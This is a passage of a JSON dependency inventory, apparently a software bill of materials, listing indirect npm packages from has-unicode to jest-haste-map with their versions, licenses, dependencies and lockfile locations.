"Identifier": { "PURL": "pkg:npm/has-unicode@2.0.1", "UID": "16f2b46333920c9f" }, "Version": "2.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9955, "EndLine": 9960 } ], "AnalyzedBy": "npm" }, { "ID": "hasown@2.0.2", "Name": "hasown", "Identifier": { "PURL": "pkg:npm/hasown@2.0.2", "UID": "141d6d3acec2cda6" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "function-bind@1.1.2" ], "Locations": [ { "StartLine": 9961, "EndLine": 9972 } ], "AnalyzedBy": "npm" }, { "ID": "he@1.2.0", "Name": "he", "Identifier": { "PURL": "pkg:npm/he@1.2.0", "UID": "33769fe8aa7c9316" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9973, "EndLine": 9981 } ], "AnalyzedBy": "npm" }, { "ID": "hermes-estree@0.29.1", "Name": "hermes-estree", "Identifier": { "PURL": "pkg:npm/hermes-estree@0.29.1", "UID": "921b8ec558aea854" }, "Version": "0.29.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9982, "EndLine": 9987 } ], "AnalyzedBy": "npm" }, { "ID": "hermes-estree@0.32.0", "Name": "hermes-estree", "Identifier": { "PURL": "pkg:npm/hermes-estree@0.32.0", "UID": "a73a6acef89a6262" }, "Version": "0.32.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12459, "EndLine": 12464 }, { "StartLine": 12698, "EndLine": 12703 } ], "AnalyzedBy": "npm" }, { "ID": "hermes-parser@0.29.1", "Name": "hermes-parser", "Identifier": { "PURL": "pkg:npm/hermes-parser@0.29.1", "UID": "70d7df2f43da5bb3" }, "Version": "0.29.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hermes-estree@0.29.1" ], "Locations": [ { "StartLine": 9988, "EndLine": 9996 } ], "AnalyzedBy": "npm" }, { "ID": "hermes-parser@0.32.0", "Name": "hermes-parser", "Identifier": { "PURL": "pkg:npm/hermes-parser@0.32.0", "UID": "4fc682fe279eac6" }, "Version": "0.32.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hermes-estree@0.32.0" ], "Locations": [ { "StartLine": 12465, "EndLine": 12473 }, { "StartLine": 12704, "EndLine": 12712 } ], "AnalyzedBy": "npm" }, { "ID": "hoist-non-react-statics@3.3.2", "Name": "hoist-non-react-statics", "Identifier": { "PURL": "pkg:npm/hoist-non-react-statics@3.3.2", "UID": "a442fe0a3b09522c" }, "Version": "3.3.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react-is@16.13.1" ], "Locations": [ { "StartLine": 9997, "EndLine": 10005 } ], "AnalyzedBy": "npm" }, { "ID": "hosted-git-info@2.8.9", "Name": "hosted-git-info", "Identifier": { "PURL": "pkg:npm/hosted-git-info@2.8.9", "UID": "854ce23e43adec12" }, "Version": "2.8.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18862, "EndLine": 18867 } ], "AnalyzedBy": "npm" }, { "ID": "hosted-git-info@4.1.0", "Name": "hosted-git-info", "Identifier": { "PURL": "pkg:npm/hosted-git-info@4.1.0", "UID": "c00c65f0d5b36ed9" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@6.0.0" ], "Locations": [ { "StartLine": 10012, "EndLine": 10023 } ], "AnalyzedBy": "npm" }, { "ID": "hosted-git-info@9.0.2", "Name": "hosted-git-info", "Identifier": { "PURL": "pkg:npm/hosted-git-info@9.0.2", "UID": "6c01770b6ea32c67" }, "Version": "9.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@11.2.2" ], "Locations": [ { "StartLine": 14397, "EndLine": 14409 } ], "AnalyzedBy": "npm" }, { "ID": "html2canvas@1.4.1", "Name": "html2canvas", "Identifier": { "PURL": "pkg:npm/html2canvas@1.4.1", "UID": "494b2d291d70587c" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "css-line-break@2.1.0", "text-segmentation@1.0.3" ], "Locations": [ { "StartLine": 10049, "EndLine": 10061 } ], "AnalyzedBy": "npm" }, { "ID": "http-cache-semantics@4.2.0", "Name": "http-cache-semantics", "Identifier": { "PURL": "pkg:npm/http-cache-semantics@4.2.0", "UID": "4add9e1f5d2e7049" }, "Version": "4.2.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10062, "EndLine": 10068 }, { "StartLine": 14410, "EndLine": 14416 } ], "AnalyzedBy": "npm" }, { "ID": "http-errors@2.0.0", "Name": "http-errors", "Identifier": { "PURL": "pkg:npm/http-errors@2.0.0", "UID": "c2a55b4c7d885022" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "depd@2.0.0", "inherits@2.0.4", "setprototypeof@1.2.0", "statuses@2.0.1", "toidentifier@1.0.1" ], "Locations": [ { "StartLine": 10069, "EndLine": 10084 } ], "AnalyzedBy": "npm" }, { "ID": "http-parser-js@0.5.10", "Name": "http-parser-js", "Identifier": { "PURL": "pkg:npm/http-parser-js@0.5.10", "UID": "6eceedc03acf71ca" }, "Version": "0.5.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10094, "EndLine": 10099 } ], "AnalyzedBy": "npm" }, { "ID": "http-proxy-agent@4.0.1", "Name": "http-proxy-agent", "Identifier": { "PURL": "pkg:npm/http-proxy-agent@4.0.1", "UID": "8e57283d93221f66" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@tootallnate/once@1.1.2", "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 10100, "EndLine": 10114 } ], "AnalyzedBy": "npm" }, { "ID": "http-proxy-agent@7.0.2", "Name": "http-proxy-agent", "Identifier": { "PURL": "pkg:npm/http-proxy-agent@7.0.2", "UID": "1e2797d36258da43" }, "Version": "7.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 14417, "EndLine": 14430 } ], "AnalyzedBy": "npm" }, { "ID": "https-proxy-agent@5.0.1", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@5.0.1", "UID": "f540eba6b53860db" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 12174, "EndLine": 12187 } ], "AnalyzedBy": "npm" }, { "ID": "https-proxy-agent@7.0.6", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@7.0.6", "UID": "62d9dfbc8efa2d62" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 10128, "EndLine": 10140 }, { "StartLine": 14431, "EndLine": 14444 } ], "AnalyzedBy": "npm" }, { "ID": "human-signals@2.1.0", "Name": "human-signals", "Identifier": { "PURL": "pkg:npm/human-signals@2.1.0", "UID": "20a451076a4cd98a" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10141, "EndLine": 10149 } ], "AnalyzedBy": "npm" }, { "ID": "humanize-ms@1.2.1", "Name": "humanize-ms", "Identifier": { "PURL": "pkg:npm/humanize-ms@1.2.1", "UID": "1a51333cffc72513" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.1.3" ], "Locations": [ { "StartLine": 10150, "EndLine": 10159 } ], "AnalyzedBy": "npm" }, { "ID": "iconv-lite@0.4.24", "Name": "iconv-lite", "Identifier": { "PURL": "pkg:npm/iconv-lite@0.4.24", "UID": "5c55f025f5539772" }, "Version": "0.4.24", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safer-buffer@2.1.2" ], "Locations": [ { "StartLine": 10160, "EndLine": 10172 } ], "AnalyzedBy": "npm" }, { "ID": "iconv-lite@0.6.3", "Name": "iconv-lite", "Identifier": { "PURL": "pkg:npm/iconv-lite@0.6.3", "UID": "78beb85751f4641e" }, "Version": "0.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safer-buffer@2.1.2" ], "Locations": [ { "StartLine": 8108, "EndLine": 8119 }, { "StartLine": 14445, "EndLine": 14458 } ], "AnalyzedBy": "npm" }, { "ID": "idb@7.1.1", "Name": "idb", "Identifier": { "PURL": "pkg:npm/idb@7.1.1", "UID": "cef13426ea6d6496" }, "Version": "7.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10173, "EndLine": 10178 } ], "AnalyzedBy": "npm" }, { "ID": "ieee754@1.2.1", "Name": "ieee754", "Identifier": { "PURL": "pkg:npm/ieee754@1.2.1", "UID": "9f7e5a06a47a5847" }, "Version": "1.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10179, "EndLine": 10198 } ], "AnalyzedBy": "npm" }, { "ID": "ignore-walk@8.0.0", "Name": "ignore-walk", "Identifier": { "PURL": "pkg:npm/ignore-walk@8.0.0", "UID": "ef2347bb81b74665" }, "Version": "8.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minimatch@10.0.3" ], "Locations": [ { "StartLine": 14459, "EndLine": 14471 } ], "AnalyzedBy": "npm" }, { "ID": "image-size@1.2.1", "Name": "image-size", "Identifier": { "PURL": "pkg:npm/image-size@1.2.1", "UID": "edc104961b5fb2b5" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "queue@6.0.2" ], "Locations": [ { "StartLine": 10209, "EndLine": 10223 } ], "AnalyzedBy": "npm" }, { "ID": "immediate@3.3.0", "Name": "immediate", "Identifier": { "PURL": "pkg:npm/immediate@3.3.0", "UID": "37990d112a50807" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10224, "EndLine": 10229 } ], "AnalyzedBy": "npm" }, { "ID": "import-fresh@3.3.1", "Name": "import-fresh", "Identifier": { "PURL": "pkg:npm/import-fresh@3.3.1", "UID": "d15d14d1e44f0c18" }, "Version": "3.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "parent-module@1.0.1", "resolve-from@4.0.0" ], "Locations": [ { "StartLine": 10230, "EndLine": 10245 } ], "AnalyzedBy": "npm" }, { "ID": "imurmurhash@0.1.4", "Name": "imurmurhash", "Identifier": { "PURL": "pkg:npm/imurmurhash@0.1.4", "UID": "f09319a3463c6ce4" }, "Version": "0.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10266, "EndLine": 10274 }, { "StartLine": 14472, "EndLine": 14481 } ], "AnalyzedBy": "npm" }, { "ID": "indent-string@4.0.0", "Name": "indent-string", "Identifier": { "PURL": "pkg:npm/indent-string@4.0.0", "UID": "a58ef672e70b766d" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10275, "EndLine": 10283 } ], "AnalyzedBy": "npm" }, { "ID": "infer-owner@1.0.4", "Name": "infer-owner", "Identifier": { "PURL": "pkg:npm/infer-owner@1.0.4", "UID": "fb92d06f527f6b55" }, "Version": "1.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10284, "EndLine": 10290 } ], "AnalyzedBy": "npm" }, { "ID": "inflight@1.0.6", "Name": "inflight", "Identifier": { "PURL": "pkg:npm/inflight@1.0.6", "UID": "eff0e4755f4cdf38" }, "Version": "1.0.6", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "once@1.4.0", "wrappy@1.0.2" ], "Locations": [ { "StartLine": 10291, "EndLine": 10301 } ], "AnalyzedBy": "npm" }, { "ID": "inherits@2.0.4", "Name": "inherits", "Identifier": { "PURL": "pkg:npm/inherits@2.0.4", "UID": "f60e3c24993947d7" }, "Version": "2.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10302, "EndLine": 10307 } ], "AnalyzedBy": "npm" }, { "ID": "ini@1.3.8", "Name": "ini", "Identifier": { "PURL": "pkg:npm/ini@1.3.8", "UID": "841b5e6e19d348e8" }, "Version": "1.3.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10308, "EndLine": 10313 } ], "AnalyzedBy": "npm" }, { "ID": "ini@5.0.0", "Name": "ini", "Identifier": { "PURL": "pkg:npm/ini@5.0.0", "UID": "92fb8cbb4c46a19e" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14482, "EndLine": 14489 } ], "AnalyzedBy": "npm" }, { "ID": "init-package-json@8.2.2", "Name": "init-package-json", "Identifier": { "PURL": "pkg:npm/init-package-json@8.2.2", "UID": "f6a54c3746e666ad" }, "Version": "8.2.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/package-json@7.0.1", "npm-package-arg@13.0.1", "promzard@2.0.0", "read@4.1.0", "semver@7.7.3", "validate-npm-package-license@3.0.4", "validate-npm-package-name@6.0.2" ], "Locations": [ { "StartLine": 14490, "EndLine": 14506 } ], "AnalyzedBy": "npm" }, { "ID": "invariant@2.2.4", "Name": "invariant", "Identifier": { "PURL": "pkg:npm/invariant@2.2.4", "UID": "5da1fd86efcd812b" }, "Version": "2.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0" ], "Locations": [ { "StartLine": 10338, "EndLine": 10346 } ], "AnalyzedBy": "npm" }, { "ID": "ip-address@10.0.1", "Name": "ip-address", "Identifier": { "PURL": "pkg:npm/ip-address@10.0.1", "UID": "6538401210ebfdee" }, "Version": "10.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10347, "EndLine": 10356 }, { "StartLine": 14507, "EndLine": 14516 } ], "AnalyzedBy": "npm" }, { "ID": "ip-regex@5.0.0", "Name": "ip-regex", "Identifier": { "PURL": "pkg:npm/ip-regex@5.0.0", "UID": "8b2ac664b63a17dc" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14517, "EndLine": 14527 } ], "AnalyzedBy": "npm" }, { "ID": "is-arguments@1.2.0", "Name": "is-arguments", "Identifier": { "PURL": "pkg:npm/is-arguments@1.2.0", "UID": "1f54ccc1c0bfae71" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "has-tostringtag@1.0.2" ], "Locations": [ { "StartLine": 10357, "EndLine": 10372 } ], "AnalyzedBy": "npm" }, { "ID": "is-arrayish@0.2.1", "Name": "is-arrayish", "Identifier": { "PURL": "pkg:npm/is-arrayish@0.2.1", "UID": "b4c0b320a66f90bd" }, "Version": "0.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10391, "EndLine": 10396 } ], "AnalyzedBy": "npm" }, { "ID": "is-arrayish@0.3.4", "Name": "is-arrayish", "Identifier": { "PURL": "pkg:npm/is-arrayish@0.3.4", "UID": "bfc8849fa78b36b4" }, "Version": "0.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19681, "EndLine": 19686 } ], "AnalyzedBy": "npm" }, { "ID": "is-callable@1.2.7", "Name": "is-callable", "Identifier": { "PURL": "pkg:npm/is-callable@1.2.7", "UID": "3ad86d0f382455f9" }, "Version": "1.2.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10450, "EndLine": 10461 } ], "AnalyzedBy": "npm" }, { "ID": "is-cidr@6.0.1", "Name": "is-cidr", "Identifier": { "PURL": "pkg:npm/is-cidr@6.0.1", "UID": "9f61cae115e5c022" }, "Version": "6.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cidr-regex@5.0.1" ], "Locations": [ { "StartLine": 14528, "EndLine": 14538 } ], "AnalyzedBy": "npm" }, { "ID": "is-core-module@2.16.1", "Name": "is-core-module", "Identifier": { "PURL": "pkg:npm/is-core-module@2.16.1", "UID": "38e2c8eb33cae185" }, "Version": "2.16.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hasown@2.0.2" ], "Locations": [ { "StartLine": 10462, "EndLine": 10476 } ], "AnalyzedBy": "npm" }, { "ID": "is-docker@2.2.1", "Name": "is-docker", "Identifier": { "PURL": "pkg:npm/is-docker@2.2.1", "UID": "9031bc7a3cb449a0" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10512, "EndLine": 10526 } ], "AnalyzedBy": "npm" }, { "ID": "is-extglob@2.1.1", "Name": "is-extglob", "Identifier": { "PURL": "pkg:npm/is-extglob@2.1.1", "UID": "336268a6f56c07a8" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10527, "EndLine": 10535 } ], "AnalyzedBy": "npm" }, { "ID": "is-fullwidth-code-point@1.0.0", "Name": "is-fullwidth-code-point", "Identifier": { "PURL": "pkg:npm/is-fullwidth-code-point@1.0.0", "UID": "ab843365774ef616" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "number-is-nan@1.0.1" ], "Locations": [ { "StartLine": 17362, "EndLine": 17373 } ], "AnalyzedBy": "npm" }, { "ID": "is-fullwidth-code-point@2.0.0", "Name": "is-fullwidth-code-point", "Identifier": { "PURL": "pkg:npm/is-fullwidth-code-point@2.0.0", "UID": "a58637eb431bf929" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10552, "EndLine": 10561 } ], "AnalyzedBy": "npm" }, { "ID": "is-fullwidth-code-point@3.0.0", "Name": "is-fullwidth-code-point", "Identifier": { "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", "UID": "6baf336fc54dac8a" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14539, "EndLine": 14548 }, { "StartLine": 20171, "EndLine": 20179 }, { "StartLine": 20180, "EndLine": 20188 } ], "AnalyzedBy": "npm" }, { "ID": "is-generator-function@1.1.2", "Name": "is-generator-function", "Identifier": { "PURL": "pkg:npm/is-generator-function@1.1.2", "UID": "4c245a6b031f7a73" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "generator-function@2.0.1", "get-proto@1.0.1", "has-tostringtag@1.0.2", "safe-regex-test@1.1.0" ], "Locations": [ { "StartLine": 10572, "EndLine": 10590 } ], "AnalyzedBy": "npm" }, { "ID": "is-glob@4.0.3", "Name": "is-glob", "Identifier": { "PURL": "pkg:npm/is-glob@4.0.3", "UID": "839fc01c93e3d10f" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-extglob@2.1.1" ], "Locations": [ { "StartLine": 10591, "EndLine": 10602 } ], "AnalyzedBy": "npm" }, { "ID": "is-interactive@1.0.0", "Name": "is-interactive", "Identifier": { "PURL": "pkg:npm/is-interactive@1.0.0", "UID": "19c449abc19d7ccd" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10603, "EndLine": 10611 } ], "AnalyzedBy": "npm" }, { "ID": "is-lambda@1.0.1", "Name": "is-lambda", "Identifier": { "PURL": "pkg:npm/is-lambda@1.0.1", "UID": "f35459f807e498ca" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10612, "EndLine": 10618 } ], "AnalyzedBy": "npm" }, { "ID": "is-number@7.0.0", "Name": "is-number", "Identifier": { "PURL": "pkg:npm/is-number@7.0.0", "UID": "e671573837f6a00f" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10645, "EndLine": 10653 } ], "AnalyzedBy": "npm" }, { "ID": "is-plain-obj@1.1.0", "Name": "is-plain-obj", "Identifier": { "PURL": "pkg:npm/is-plain-obj@1.1.0", "UID": "452f0f2054799ec6" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12860, "EndLine": 12868 } ], "AnalyzedBy": "npm" }, { "ID": "is-plain-obj@2.1.0", "Name": "is-plain-obj", "Identifier": { "PURL": "pkg:npm/is-plain-obj@2.1.0", "UID": "97dd0188552c8f32" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10681, "EndLine": 10689 } ], "AnalyzedBy": "npm" }, { "ID": "is-regex@1.2.1", "Name": "is-regex", "Identifier": { "PURL": "pkg:npm/is-regex@1.2.1", "UID": "6be382c339384c53" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "gopd@1.2.0", "has-tostringtag@1.0.2", "hasown@2.0.2" ], "Locations": [ { "StartLine": 10690, "EndLine": 10707 } ], "AnalyzedBy": "npm" }, { "ID": "is-stream@1.1.0", "Name": "is-stream", "Identifier": { "PURL": "pkg:npm/is-stream@1.1.0", "UID": "3375780eb1321615" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13222, "EndLine": 13230 } ], "AnalyzedBy": "npm" }, { "ID": "is-stream@2.0.1", "Name": "is-stream", "Identifier": { "PURL": "pkg:npm/is-stream@2.0.1", "UID": "d5ed279d40ee8fbd" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10737, "EndLine": 10748 } ], "AnalyzedBy": "npm" }, { "ID": "is-typed-array@1.1.15", "Name": "is-typed-array", "Identifier": { "PURL": "pkg:npm/is-typed-array@1.1.15", "UID": "744136c53ffb383c" }, "Version": "1.1.15", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "which-typed-array@1.1.19" ], "Locations": [ { "StartLine": 10784, "EndLine": 10798 } ], "AnalyzedBy": "npm" }, { "ID": "is-unicode-supported@0.1.0", "Name": "is-unicode-supported", "Identifier": { "PURL": "pkg:npm/is-unicode-supported@0.1.0", "UID": "50ca81742e2f4e3c" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10799, "EndLine": 10810 } ], "AnalyzedBy": "npm" }, { "ID": "is-wsl@1.1.0", "Name": "is-wsl", "Identifier": { "PURL": "pkg:npm/is-wsl@1.1.0", "UID": "e12b05528f66bd39" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10857, "EndLine": 10866 } ], "AnalyzedBy": "npm" }, { "ID": "is-wsl@2.2.0", "Name": "is-wsl", "Identifier": { "PURL": "pkg:npm/is-wsl@2.2.0", "UID": "db729d2f4f88e745" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-docker@2.2.1" ], "Locations": [ { "StartLine": 4642, "EndLine": 4653 }, { "StartLine": 7046, "EndLine": 7057 }, { "StartLine": 7072, "EndLine": 7083 }, { "StartLine": 16415, "EndLine": 16427 } ], "AnalyzedBy": "npm" }, { "ID": "isarray@1.0.0", "Name": "isarray", "Identifier": { "PURL": "pkg:npm/isarray@1.0.0", "UID": "71e77d50f743322c" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17374, "EndLine": 17379 } ], "AnalyzedBy": "npm" }, { "ID": "isexe@2.0.0", "Name": "isexe", "Identifier": { "PURL": "pkg:npm/isexe@2.0.0", "UID": "1a7351a2f4c30bab" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10874, "EndLine": 10879 }, { "StartLine": 14219, "EndLine": 14225 } ], "AnalyzedBy": "npm" }, { "ID": "isexe@3.1.1", "Name": "isexe", "Identifier": { "PURL": "pkg:npm/isexe@3.1.1", "UID": "b3d24e9281408eeb" }, "Version": "3.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14549, "EndLine": 14556 } ], "AnalyzedBy": "npm" }, { "ID": "isomorphic-fetch@2.2.1", "Name": "isomorphic-fetch", "Identifier": { "PURL": "pkg:npm/isomorphic-fetch@2.2.1", "UID": "1b8183746265654" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "node-fetch@1.7.3", "whatwg-fetch@3.6.20" ], "Locations": [ { "StartLine": 10880, "EndLine": 10889 } ], "AnalyzedBy": "npm" }, { "ID": "istanbul-lib-coverage@3.2.2", "Name": "istanbul-lib-coverage", "Identifier": { "PURL": "pkg:npm/istanbul-lib-coverage@3.2.2", "UID": "9db5375cbd971ad" }, "Version": "3.2.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10890, "EndLine": 10898 } ], "AnalyzedBy": "npm" }, { "ID": "istanbul-lib-instrument@5.2.1", "Name": "istanbul-lib-instrument", "Identifier": { "PURL": "pkg:npm/istanbul-lib-instrument@5.2.1", "UID": "9a3e5c10da1386ff" }, "Version": "5.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/parser@7.28.4", "@istanbuljs/schema@0.1.3", "istanbul-lib-coverage@3.2.2", "semver@6.3.1" ], "Locations": [ { "StartLine": 6291, "EndLine": 6306 } ], "AnalyzedBy": "npm" }, { "ID": "jackspeak@3.4.3", "Name": "jackspeak", "Identifier": { "PURL": "pkg:npm/jackspeak@3.4.3", "UID": "f61d9b4149d7a829" }, "Version": "3.4.3", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/cliui@8.0.2", "@pkgjs/parseargs@0.11.0" ], "Locations": [ { "StartLine": 10991, "EndLine": 11005 }, { "StartLine": 15037, "EndLine": 15052 } ], "AnalyzedBy": "npm" }, { "ID": "jackspeak@4.1.1", "Name": "jackspeak", "Identifier": { "PURL": "pkg:npm/jackspeak@4.1.1", "UID": "65a011f519731efd" }, "Version": "4.1.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/cliui@8.0.2" ], "Locations": [ { "StartLine": 14557, "EndLine": 14570 } ], "AnalyzedBy": "npm" }, { "ID": "jest-environment-node@29.7.0", "Name": "jest-environment-node", "Identifier": { "PURL": "pkg:npm/jest-environment-node@29.7.0", "UID": "181f8fd2d42e8dab" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/environment@29.7.0", "@jest/fake-timers@29.7.0", "@jest/types@29.6.3", "@types/node@24.7.0", "jest-mock@29.7.0", "jest-util@29.7.0" ], "Locations": [ { "StartLine": 11206, "EndLine": 11222 } ], "AnalyzedBy": "npm" }, { "ID": "jest-get-type@29.6.3", "Name": "jest-get-type", "Identifier": { "PURL": "pkg:npm/jest-get-type@29.6.3", "UID": "bea0f86f787fbee1" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11223, "EndLine": 11231 } ], "AnalyzedBy": "npm" }, { "ID": "jest-haste-map@29.7.0", "Name": "jest-haste-map", "Identifier": { "PURL": "pkg:npm/jest-haste-map@29.7.0", "UID": "e40d9e03c90143cc" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@types/graceful-fs@4.1.9", "@types/node@24.7.0", "anymatch@3.1.3", "fb-watchman@2.0.2", "fsevents@2.3.3", "graceful-fs@4.2.11", "jest-regex-util@29.6.3", "jest-util@29.7.0", "jest-worker@29.7.0", "micromatch@4.0.8", "walker@1.0.8" ], "Locations": [ { "StartLine": 11232, "EndLine": 11256 } ], "AnalyzedBy": "npm" }, { 